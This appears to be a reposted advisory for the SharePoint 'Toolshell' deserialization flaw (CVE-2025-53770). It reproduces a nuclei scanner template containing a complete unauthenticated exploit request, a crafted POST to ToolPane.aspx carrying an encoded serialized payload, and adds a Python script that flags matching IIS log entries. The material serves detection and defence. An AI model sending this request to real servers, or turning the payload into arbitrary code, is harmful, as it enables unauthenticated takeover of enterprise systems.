Microsoft SharePoint Remote Code Execution Toolshell Vulnerability

Vulnerability Information

Vulnerability name: Microsoft SharePoint Remote Code Execution “Toolshell” Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-53770

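Vulnerability type: Deserialization

Severity: Critical

Description: Microsoft SharePoint is a widely used enterprise collaboration platform that supports document management, content management, social networking and other functions, and is widely deployed for team collaboration inside and outside the enterprise. This vulnerability involves SharePoint's Web Part editor: it allows an attacker to reach the editor without authentication and then execute code through insecure deserialization of an object in the request body. Specifically, the root cause is that SharePoint fails to properly validate and sanitize user input when handling certain requests, so an attacker can craft a malicious serialized object and thereby execute arbitrary code on the server. Exploitation requires no user interaction and can be triggered remotely, which poses a serious threat to affected systems. An attacker who successfully exploits the vulnerability can take full control of the affected SharePoint server, execute arbitrary code, access sensitive data, and even move further into the internal enterprise network. Because SharePoint is so widely used in enterprises, the impact of this vulnerability may be very broad, and immediate patching is required.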

Vendor: Microsoft

Product: SharePoint

Source: https://github.com/projectdiscovery/nuclei-templates/blob/5ee39e98afc70848cf8805e5975243f7e9e06ca7/http%2Fcves%2FCVE-2025-53770.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details


id: CVE-2025-53770

info:
  name: Microsoft SharePoint - Remote Code Execution "Toolshell"
  author: SamIntruder
  severity: critical
  description: |
    A combination of two issues in Microsoft SharePoint allows an attacker to access the Web Part editor without authentication, and then via insecure deserialization of an object in the request body, execute code.
  impact: |
    Vulnerable versions of SharePoint on-premises can be exploited to execute chosen code.
  reference:
    - https://cvemon.intruder.io/cves/CVE-2025-53770
    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
    - https://github.com/hazcod/CVE-2025-53770
  classification:
    cve-id: CVE-2025-53770
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  metadata:
    max-request: 1
  tags: cve,cve2025,sharepoint,rce

requests:
  - raw:
      - |
        POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
        Host: {{Host}}
        Referer: /_layouts/SignOut.aspx
        Content-Type: application/x-www-form-urlencoded

        MSOTlPn_Uri={{Scheme}}://{{Host}}&MSOTlPn_DWP=%0A%3C%25%40%20Register%20Tagprefix%3D%22Scorecard%22%20Namespace%3D%22Microsoft%2EPerformancePoint%2EScorecards%22%20Assembly%3D%22Microsoft%2EPerformancePoint%2EScorecards%2EClient%2C%20Version%3D16%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D71e9bce111e9429c%22%20%25%3E%0A%3C%25%40%20Register%20Tagprefix%3D%22asp%22%20Namespace%3D%22System%2EWeb%2EUI%22%20Assembly%3D%22System%2EWeb%2EExtensions%2C%20Version%3D4%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35%22%20%25%3E%0A%3Casp%3AUpdateProgress%20ID%3D%22UpdateProgress1%22%20DisplayAfter%3D%2210%22%20runat%3D%22server%22%20AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%20%20%3CProgressTemplate%3E%0A%20%20%20%20%3Cdiv%20class%3D%22divWaiting%22%3E%0A%20%20%20%20%20%20%3CScorecard%3AExcelDataSet%20CompressedDataTable%3D%22H4sIAADEfmgA%2F4WRX2uzMBTG7%2F0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9%2BPEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c%2Bc1Umalp33%2F0%2F62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl%2BftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S%2FVeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1%2Bt%2Fpbj%2BvyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA%3D%22%20DataTable%2DCaseSensitive%3D%22false%22%20runat%3D%22server%22%3E%3C%2FScorecard%3AExcelDataSet%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%20%20%3C%2FProgressTemplate%3E%0A%3C%2Fasp%3AUpdateProgress%3E%0A

    # Pull the CompressedDataTable attribute value out of the response body.
    extractors:
      - type: regex
        part: body
        regex:
          - 'CompressedDataTable="(.*?)"'
        name: encoded_response
        group: 1
        internal: true

    # Match only when that value, base64-decoded and gunzipped, contains the scanner's marker string.
    matchers:
      - type: dsl
        name: decoded_response
        dsl:
          - contains(gzip_decode(base64_decode(encoded_response)), "IntruderScannerDetectionPayload")
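
A defender-side complement to the template, added here as an example and not part of the original page or the nuclei-templates project: it scans IIS W3C logs for requests with the same shape the template sends (POST to `/_layouts/15/ToolPane.aspx` with `DisplayMode=Edit` and a `SignOut.aspx` Referer). The log field set, the sample log lines and the function names are assumptions constructed for illustration.

```python
TARGET_STEM = "/_layouts/15/toolpane.aspx"  # POST path in the template's raw request
SIGNOUT_PAGE = "/signout.aspx"  # template sends Referer: /_layouts/SignOut.aspx
REPORT_FIELDS = ("date", "time", "c-ip", "cs-username", "sc-status")

# Constructed sample log (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip cs(Referer) sc-status
2025-07-21 09:14:02 GET /_layouts/15/start.aspx - CONTOSO\\alice 198.51.100.7 - 200
2025-07-21 09:15:40 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx - 203.0.113.50 /_layouts/SignOut.aspx 200
2025-07-21 09:16:11 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit CONTOSO\\bob 198.51.100.9 https://sp.example.test/sites/hr/default.aspx 200
2025-07-21 09:17:30 GET /_layouts/SignOut.aspx - - 203.0.113.50 - 200
"""


def parse_w3c(text):
    """Yield one dict per request, using the most recent #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))


def is_suspicious(entry):
    """True for a POST to ToolPane.aspx in edit mode with a SignOut.aspx Referer."""
    referer = entry.get("cs(Referer)", "-").lower().split("?", 1)[0]
    return (
        entry.get("cs-method", "").upper() == "POST"
        and entry.get("cs-uri-stem", "").lower() == TARGET_STEM
        and "displaymode=edit" in entry.get("cs-uri-query", "").lower()
        and referer.endswith(SIGNOUT_PAGE)
    )


def find_hits(text):
    """Return (date, time, client IP, username, status) for each matching request."""
    return [
        tuple(entry.get(name, "-") for name in REPORT_FIELDS)
        for entry in parse_w3c(text)
        if is_suspicious(entry)
    ]


if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print("review:", *hit)
```

A `cs-username` of `-` on a hit means IIS recorded no authenticated user for the request, which fits the unauthenticated access the description refers to.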



http://example.com/2025/07/22/github_2800928979/
Author: lianccc
Published: July 22, 2025